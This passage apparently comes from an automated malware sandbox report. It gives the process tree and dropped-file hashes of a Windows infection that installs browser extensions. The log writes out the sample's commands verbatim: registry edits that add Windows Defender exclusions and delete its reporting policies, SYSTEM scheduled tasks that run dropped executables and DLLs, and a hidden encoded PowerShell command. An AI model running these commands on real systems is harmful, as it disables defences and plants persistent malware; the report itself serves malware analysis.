                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rFkCZBmYGfkU2" /t REG_DWORD /d 0 /reg:64
                                                                                                        3⤵
                                                                                                          PID:424
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\TtwSUYpchTTJbcVB /t REG_DWORD /d 0 /reg:32
                                                                                                          3⤵
                                                                                                            PID:2404
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\TtwSUYpchTTJbcVB /t REG_DWORD /d 0 /reg:64
                                                                                                            3⤵
                                                                                                              PID:2776
                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                              3⤵
                                                                                                                PID:1144
                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                3⤵
                                                                                                                  PID:4928
                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                  3⤵
                                                                                                                    PID:3968
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                    3⤵
                                                                                                                      PID:3104
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\knkIMJmkYxNLeRxtR /t REG_DWORD /d 0 /reg:32
                                                                                                                      3⤵
                                                                                                                        PID:368
                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\knkIMJmkYxNLeRxtR /t REG_DWORD /d 0 /reg:64
                                                                                                                        3⤵
                                                                                                                          PID:3208
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\qMfgxxkvaFNxVGCk /t REG_DWORD /d 0 /reg:32
                                                                                                                          3⤵
                                                                                                                            PID:1576
                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\qMfgxxkvaFNxVGCk /t REG_DWORD /d 0 /reg:64
                                                                                                                            3⤵
                                                                                                                              PID:3780
                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                            schtasks /CREATE /TN "glLVqNcIc" /SC once /ST 00:29:19 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                            2⤵
                                                                                                                            • Creates scheduled task(s)
                                                                                                                            PID:2132
                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                            schtasks /run /I /tn "glLVqNcIc"
                                                                                                                            2⤵
                                                                                                                              PID:2688
                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                              schtasks /DELETE /F /TN "glLVqNcIc"
                                                                                                                              2⤵
                                                                                                                                PID:2492
                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                schtasks /CREATE /TN "ULPYamQDIjWIhTUbi" /SC once /ST 00:51:45 /RU "SYSTEM" /TR "\"C:\Windows\Temp\qMfgxxkvaFNxVGCk\lXXVCSOPWGZMZyR\PdEQbdf.exe\" Rg /qosite_idQay 525403 /S" /V1 /F
                                                                                                                                2⤵
                                                                                                                                • Drops file in Windows directory
                                                                                                                                • Creates scheduled task(s)
                                                                                                                                PID:1212
                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                schtasks /run /I /tn "ULPYamQDIjWIhTUbi"
                                                                                                                                2⤵
                                                                                                                                  PID:2576
                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                1⤵
                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                PID:4896
                                                                                                                                • C:\Windows\system32\gpupdate.exe
                                                                                                                                  "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                  2⤵
                                                                                                                                    PID:520
                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      3⤵
                                                                                                                                        PID:424
                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                                    1⤵
                                                                                                                                      PID:4928
                                                                                                                                    • C:\Windows\system32\gpscript.exe
                                                                                                                                      gpscript.exe /RefreshSystemParam
                                                                                                                                      1⤵
                                                                                                                                        PID:3104
                                                                                                                                      • C:\Windows\Temp\qMfgxxkvaFNxVGCk\lXXVCSOPWGZMZyR\PdEQbdf.exe
                                                                                                                                        C:\Windows\Temp\qMfgxxkvaFNxVGCk\lXXVCSOPWGZMZyR\PdEQbdf.exe Rg /qosite_idQay 525403 /S
                                                                                                                                        1⤵
                                                                                                                                        • Checks computer location settings
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Drops Chrome extension
                                                                                                                                        • Drops desktop.ini file(s)
                                                                                                                                        • Drops file in System32 directory
                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                        PID:3384
                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                          schtasks /DELETE /F /TN "bRiKnmLOZFdkMPGuzv"
                                                                                                                                          2⤵
                                                                                                                                            PID:60
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                                                                                                            2⤵
                                                                                                                                              PID:3156
                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                                                                                                                3⤵
                                                                                                                                                  PID:4500
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                                                                                                                2⤵
                                                                                                                                                  PID:2204
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                                                                                                                    3⤵
                                                                                                                                                      PID:3664
                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                    schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\EUszDIIxU\iYmHsr.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "PyTaEsvcdFypYsh" /V1 /F
                                                                                                                                                    2⤵
                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                    PID:376
                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                    schtasks /CREATE /TN "PyTaEsvcdFypYsh2" /F /xml "C:\Program Files (x86)\EUszDIIxU\bmimjiL.xml" /RU "SYSTEM"
                                                                                                                                                    2⤵
                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                    PID:1212
                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                    schtasks /END /TN "PyTaEsvcdFypYsh"
                                                                                                                                                    2⤵
                                                                                                                                                      PID:4536
                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                      schtasks /DELETE /F /TN "PyTaEsvcdFypYsh"
                                                                                                                                                      2⤵
                                                                                                                                                        PID:4904
                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                        schtasks /CREATE /TN "WwyRNVlKozxkMR" /F /xml "C:\Program Files (x86)\rFkCZBmYGfkU2\XadfikF.xml" /RU "SYSTEM"
                                                                                                                                                        2⤵
                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                        PID:2124
                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                        schtasks /CREATE /TN "OTILkGDakfAsN2" /F /xml "C:\ProgramData\TtwSUYpchTTJbcVB\WCquwgs.xml" /RU "SYSTEM"
                                                                                                                                                        2⤵
                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                        PID:2360
                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                        schtasks /CREATE /TN "GWxyEmjyURDtQJJTe2" /F /xml "C:\Program Files (x86)\FncWqVonEAflrVaxqNR\bnWItux.xml" /RU "SYSTEM"
                                                                                                                                                        2⤵
                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                        PID:3108
                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                        schtasks /CREATE /TN "TyQOTUQyxpQhGBNnFCS2" /F /xml "C:\Program Files (x86)\IjchgTxaUtSoC\nTJuXzY.xml" /RU "SYSTEM"
                                                                                                                                                        2⤵
                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                        PID:4736
                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                        schtasks /CREATE /TN "oYgNoNeTxNTUFfDli" /SC once /ST 00:45:47 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\qMfgxxkvaFNxVGCk\gAXPDAAA\JlGFjJW.dll\",#1 /Dhsite_idFAZ 525403" /V1 /F
                                                                                                                                                        2⤵
                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                        PID:424
                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                        schtasks /run /I /tn "oYgNoNeTxNTUFfDli"
                                                                                                                                                        2⤵
                                                                                                                                                          PID:1188
                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
                                                                                                                                                          2⤵
                                                                                                                                                            PID:2028
                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                              REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
                                                                                                                                                              3⤵
                                                                                                                                                                PID:4516
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
                                                                                                                                                              2⤵
                                                                                                                                                                PID:1492
                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                  REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:392
                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                  schtasks /DELETE /F /TN "ULPYamQDIjWIhTUbi"
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:3148
                                                                                                                                                                • C:\Windows\system32\rundll32.EXE
                                                                                                                                                                  C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\qMfgxxkvaFNxVGCk\gAXPDAAA\JlGFjJW.dll",#1 /Dhsite_idFAZ 525403
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:4272
                                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                      C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\qMfgxxkvaFNxVGCk\gAXPDAAA\JlGFjJW.dll",#1 /Dhsite_idFAZ 525403
                                                                                                                                                                      2⤵
                                                                                                                                                                      • Blocklisted process makes network request
                                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                      • Enumerates system info in registry
                                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                                      PID:5032
                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                        schtasks /DELETE /F /TN "oYgNoNeTxNTUFfDli"
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:4800
                                                                                                                                                                    • C:\Windows\system32\rundll32.exe
                                                                                                                                                                      "C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:2536
                                                                                                                                                                      • C:\Windows\System32\svchost.exe
                                                                                                                                                                        C:\Windows\System32\svchost.exe -k UnistackSvcGroup
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                        PID:1256

                                                                                                                                                                      Network

                                                                                                                                                                            MITRE ATT&CK Enterprise v15

                                                                                                                                                                            Replay Monitor

                                                                                                                                                                            Loading Replay Monitor...

                                                                                                                                                                            Downloads

                                                                                                                                                                            • C:\Program Files (x86)\EUszDIIxU\bmimjiL.xml

                                                                                                                                                                              Filesize

                                                                                                                                                                              2KB

                                                                                                                                                                              MD5

                                                                                                                                                                              90085423695672d3f9716361ecaa16f5

                                                                                                                                                                              SHA1

                                                                                                                                                                              b7ef7246d6492a9c95127c940c6dafbc8db4338b

                                                                                                                                                                              SHA256

                                                                                                                                                                              e4722bdafff4611fbe28450f20a9c7532794dca166dff1855be7f10bd210bb38

                                                                                                                                                                              SHA512

                                                                                                                                                                              add92de3683fe97f3a0cfb7df2f08b1e3b4f1801fc1458856448373aa287d43b63ee103a6765d05c497a00380defcb227d1f4c056966dd0abd68b3e1c93ec960

                                                                                                                                                                            • C:\Program Files (x86)\FncWqVonEAflrVaxqNR\bnWItux.xml

                                                                                                                                                                              Filesize

                                                                                                                                                                              2KB

                                                                                                                                                                              MD5

                                                                                                                                                                              ccc713e573a9e3a0b3964265df5abdd5

                                                                                                                                                                              SHA1

                                                                                                                                                                              924604b83e0833904a8308911bdc3990d00aceeb

                                                                                                                                                                              SHA256

                                                                                                                                                                              39f18fc1dd8cae15fe8abf5d843ed7836a27ddeaa1cfba0af88a5a0ee74a7535

                                                                                                                                                                              SHA512

                                                                                                                                                                              1934c3de2dd57a096391de44976260c9c0501ad428ede3e0ce3977ec8ff0bd91a0e8b0b822acc7f8782d783f9f4007088c6a658b1df6110bb7569dfd18e41b05

                                                                                                                                                                            • C:\Program Files (x86)\IjchgTxaUtSoC\nTJuXzY.xml

                                                                                                                                                                              Filesize

                                                                                                                                                                              2KB

                                                                                                                                                                              MD5

                                                                                                                                                                              a2c3fe6693d2a37fb3bb88cee0dbc5f1

                                                                                                                                                                              SHA1

                                                                                                                                                                              41c0eee63c71c4865c43835f461f9bae371aa955

                                                                                                                                                                              SHA256

                                                                                                                                                                              fc2f0550601e5d966a7666bd7bced990ba8ad2d2be0291775b164a5ac3407eaf

                                                                                                                                                                              SHA512

                                                                                                                                                                              810cc1ae49cd9f39e23cba2598747a61b69833737aa9dccd3634c410b79dbb46f99d63249227097c7202232984415f8d6ab3fe799af5dd82b468e1385bc7e7ea

                                                                                                                                                                            • C:\Program Files (x86)\rFkCZBmYGfkU2\XadfikF.xml

                                                                                                                                                                              Filesize

                                                                                                                                                                              2KB

                                                                                                                                                                              MD5

                                                                                                                                                                              30ffcda5adcf7f1f9391fc55f78c47cd

                                                                                                                                                                              SHA1

                                                                                                                                                                              3e814aa13cb6aa80fbc298738a5774bae25c3184

                                                                                                                                                                              SHA256

                                                                                                                                                                              12e8656f8cecc11647552598b3ebb05443c17f0f8f9b257b23a26e60b6949875

                                                                                                                                                                              SHA512

                                                                                                                                                                              de124bfd259c5511561623307eed824c6e9c7aae21acff34963c4c733b4f0861e3904490c68d063fb12ceebc526a8534a7d95619b2a76e5f4948be55b9895300

                                                                                                                                                                            • C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi

                                                                                                                                                                              Filesize

                                                                                                                                                                              1.2MB

                                                                                                                                                                              MD5

                                                                                                                                                                              32ffd18dc6ca7a74486365506bdf474a

                                                                                                                                                                              SHA1

                                                                                                                                                                              6df843c244896004e390540722186e08cf2676e3

                                                                                                                                                                              SHA256

                                                                                                                                                                              1b12e7d52c1d61c96e59c8f59b8ce1b066225af4a4ebf86837c1a0f7b8a8b874

                                                                                                                                                                              SHA512

                                                                                                                                                                              8983bbca74b7d3d261f90afc1b1f4544d9d1daa0b7705980ea17f08cd6242cf770ec7d16d5948a46a1bdad50953b9edb17d493d9431b2d7ee2d0770a896a325a

                                                                                                                                                                            • C:\ProgramData\TtwSUYpchTTJbcVB\WCquwgs.xml

                                                                                                                                                                              Filesize

                                                                                                                                                                              2KB

                                                                                                                                                                              MD5

                                                                                                                                                                              7c7f64e1be4bf5186df83fbdd26afada

                                                                                                                                                                              SHA1

                                                                                                                                                                              6ccae2a23b9d3f74d39e5e02b0da8de01871bf6b

                                                                                                                                                                              SHA256

                                                                                                                                                                              1d1d6e21a1eb511dd13bed78469e5442d2531edbd41efc85ffecad4bcf0152cb

                                                                                                                                                                              SHA512

                                                                                                                                                                              560db796cde269a3e2c4a4ab9d868309ac804055f9fbb726cd9889e10f5cb786673a1659ebef2b3fc093fb3a02bf65eab7dff8da711c15dd1994a43a3d797790

                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Comms\UnistoreDB\store.jfm

                                                                                                                                                                              Filesize

                                                                                                                                                                              16KB

                                                                                                                                                                              MD5

                                                                                                                                                                              3a28087852f6510192e8d2cbaa98c28f

                                                                                                                                                                              SHA1

                                                                                                                                                                              16b3a5d0eea3a0bdf8553ddb167abcb9bbaca844

                                                                                                                                                                              SHA256

                                                                                                                                                                              4e15ebdb47a3dbdb03d401afc0b2e0023c519b592cd20dcfccc3e95c5851a826

                                                                                                                                                                              SHA512

                                                                                                                                                                              490ec76406b111f696865c742477a82c34ca4d6b44ae2c2c36dfea3d0a6a30bcd6e53a234726c1a410b24cc5fea01382364bb6cd8eaf2128f9413d08d52d68ec

                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json

                                                                                                                                                                              Filesize

                                                                                                                                                                              187B

                                                                                                                                                                              MD5

                                                                                                                                                                              2a1e12a4811892d95962998e184399d8

                                                                                                                                                                              SHA1

                                                                                                                                                                              55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

                                                                                                                                                                              SHA256

                                                                                                                                                                              32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

                                                                                                                                                                              SHA512

                                                                                                                                                                              bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json

                                                                                                                                                                              Filesize

                                                                                                                                                                              136B

                                                                                                                                                                              MD5

                                                                                                                                                                              238d2612f510ea51d0d3eaa09e7136b1

                                                                                                                                                                              SHA1

                                                                                                                                                                              0953540c6c2fd928dd03b38c43f6e8541e1a0328

                                                                                                                                                                              SHA256

                                                                                                                                                                              801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

                                                                                                                                                                              SHA512

                                                                                                                                                                              2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json

                                                                                                                                                                              Filesize

                                                                                                                                                                              150B

                                                                                                                                                                              MD5

                                                                                                                                                                              0b1cf3deab325f8987f2ee31c6afc8ea

                                                                                                                                                                              SHA1

                                                                                                                                                                              6a51537cef82143d3d768759b21598542d683904

                                                                                                                                                                              SHA256

                                                                                                                                                                              0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

                                                                                                                                                                              SHA512

                                                                                                                                                                              5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                                                                              Filesize

                                                                                                                                                                              10KB

                                                                                                                                                                              MD5

                                                                                                                                                                              8e0dac369d708b8e553c64e5d046627c

                                                                                                                                                                              SHA1

                                                                                                                                                                              814a50c11416426fe975175886868b9063616d2d

                                                                                                                                                                              SHA256

                                                                                                                                                                              8dda3d75ac6812e3330267cbe2aca44057945b9b575c2a04836aeb1ac8c84eb8

                                                                                                                                                                              SHA512

                                                                                                                                                                              f718f4f030e2eee7efb346aedf8028ffd80b67314d3efbc4089d6db673a7737a1ff521730726e34a6d772d45ddcccca5059e5ac090bb352251c238fbd5c20659

                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log

                                                                                                                                                                              Filesize

                                                                                                                                                                              2KB

                                                                                                                                                                              MD5

                                                                                                                                                                              24cd57a8710ead89af77751cc4ce3236

                                                                                                                                                                              SHA1

                                                                                                                                                                              d66a76341ec9d1f53adc3caedfbc2a78e1055a30

                                                                                                                                                                              SHA256

                                                                                                                                                                              ca494d00a7aba63fc4cf7c49316bccee057616a26b917f9f12692b36b1f1dd91

                                                                                                                                                                              SHA512

                                                                                                                                                                              903577e4d3cd91d47dbd9f4f49c48236aef013c12ed36dc8a338c23845680b709af7e5272c21f036ea88c7b6ca10d090eb2cede1d836557d8ea37d071358223f

                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\abgdohlnibdejcajjfmngebmdanjldcc\1.2_0\_locales\es\messages.json

                                                                                                                                                                              Filesize

                                                                                                                                                                              151B

                                                                                                                                                                              MD5

                                                                                                                                                                              bd6b60b18aee6aaeb83b35c68fb48d88

                                                                                                                                                                              SHA1

                                                                                                                                                                              9b977a5fbf606d1104894e025e51ac28b56137c3

                                                                                                                                                                              SHA256

                                                                                                                                                                              b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55

                                                                                                                                                                              SHA512

                                                                                                                                                                              3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b

                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                              Filesize

                                                                                                                                                                              9KB

                                                                                                                                                                              MD5

                                                                                                                                                                              cc5a245c6d5a30bc632bb75f8c2abfea

                                                                                                                                                                              SHA1

                                                                                                                                                                              c0b56e4bde3b3bf71b444a9d17283d887073cbbb

                                                                                                                                                                              SHA256

                                                                                                                                                                              ea22aed97272ade576523a30561e56a5b2879aadc1513edf9874f4e91f4e8c80

                                                                                                                                                                              SHA512

                                                                                                                                                                              2ed27d6ec890351c05d5472f764a4183f867ab5e9c7ad642077ff2a4c36bd6900a5fce1e996d620a89b04efe89f2e046692cdbfcff90d44fb1d15a06b450aaa2

                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                              Filesize

                                                                                                                                                                              64B

                                                                                                                                                                              MD5

                                                                                                                                                                              3ca1082427d7b2cd417d7c0b7fd95e4e

                                                                                                                                                                              SHA1

                                                                                                                                                                              b0482ff5b58ffff4f5242d77330b064190f269d3

                                                                                                                                                                              SHA256

                                                                                                                                                                              31f15dc6986680b158468bf0b4a1c00982b07b2889f360befd8a466113940d8f

                                                                                                                                                                              SHA512

                                                                                                                                                                              bbcfd8ea1e815524fda500b187483539be4a8865939f24c6e713f0a3bd90b69b4367c36aa2b09886b2006b685f81f0a77eec23ab58b7e2fb75304b412deb6ca3

                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS949F.tmp\Install.exe

                                                                                                                                                                              Filesize

                                                                                                                                                                              6.1MB

                                                                                                                                                                              MD5

                                                                                                                                                                              58b3e4f87f1aa519b666596e7cf0a592

                                                                                                                                                                              SHA1

                                                                                                                                                                              a861d11cb4552bdf993c3a69f7fca5610140fe14

                                                                                                                                                                              SHA256

                                                                                                                                                                              0b06b2799c26a15818bae6173da36fd86f122639a3f66a18dadbaefc7c845a5c

                                                                                                                                                                              SHA512

                                                                                                                                                                              7ad1d36e37e31e7f240e36bf9ac9e76c1bc2646aeb7f610cf94d34fbf96e05bec3bcebb3bcdaf25a29d289cf83b71cb75c759117a41e88e862377537360216f1

                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS949F.tmp\Install.exe

                                                                                                                                                                              Filesize

                                                                                                                                                                              6.1MB

                                                                                                                                                                              MD5

                                                                                                                                                                              58b3e4f87f1aa519b666596e7cf0a592

                                                                                                                                                                              SHA1

                                                                                                                                                                              a861d11cb4552bdf993c3a69f7fca5610140fe14

                                                                                                                                                                              SHA256

                                                                                                                                                                              0b06b2799c26a15818bae6173da36fd86f122639a3f66a18dadbaefc7c845a5c

                                                                                                                                                                              SHA512

                                                                                                                                                                              7ad1d36e37e31e7f240e36bf9ac9e76c1bc2646aeb7f610cf94d34fbf96e05bec3bcebb3bcdaf25a29d289cf83b71cb75c759117a41e88e862377537360216f1

                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS95D7.tmp\Install.exe

                                                                                                                                                                              Filesize

                                                                                                                                                                              7.0MB

                                                                                                                                                                              MD5

                                                                                                                                                                              a52dabfd55a6a04633ac83693b0a4177

                                                                                                                                                                              SHA1

                                                                                                                                                                              184c0c38f9ae941f2adbf47ef1f3be362926ad22

                                                                                                                                                                              SHA256

                                                                                                                                                                              bd637071d3d05a774893ec7643e9c4ebcd7c0628bdee233f1c2a6f0aabc7bcfe

                                                                                                                                                                              SHA512

                                                                                                                                                                              5de6514dbc7f8bd58a902d6599c5f2f2650fe7fb1a0ce444f718d70abc639c0f9c9883ea8c79aa6bfe48f83c9dfe5d1c50fc130b485d212c6c7ce9b2287e3b12

                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS95D7.tmp\Install.exe

                                                                                                                                                                              Filesize

                                                                                                                                                                              7.0MB

                                                                                                                                                                              MD5

                                                                                                                                                                              a52dabfd55a6a04633ac83693b0a4177

                                                                                                                                                                              SHA1

                                                                                                                                                                              184c0c38f9ae941f2adbf47ef1f3be362926ad22

                                                                                                                                                                              SHA256

                                                                                                                                                                              bd637071d3d05a774893ec7643e9c4ebcd7c0628bdee233f1c2a6f0aabc7bcfe

                                                                                                                                                                              SHA512

                                                                                                                                                                              5de6514dbc7f8bd58a902d6599c5f2f2650fe7fb1a0ce444f718d70abc639c0f9c9883ea8c79aa6bfe48f83c9dfe5d1c50fc130b485d212c6c7ce9b2287e3b12

                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4zf4wzct.ap5.ps1

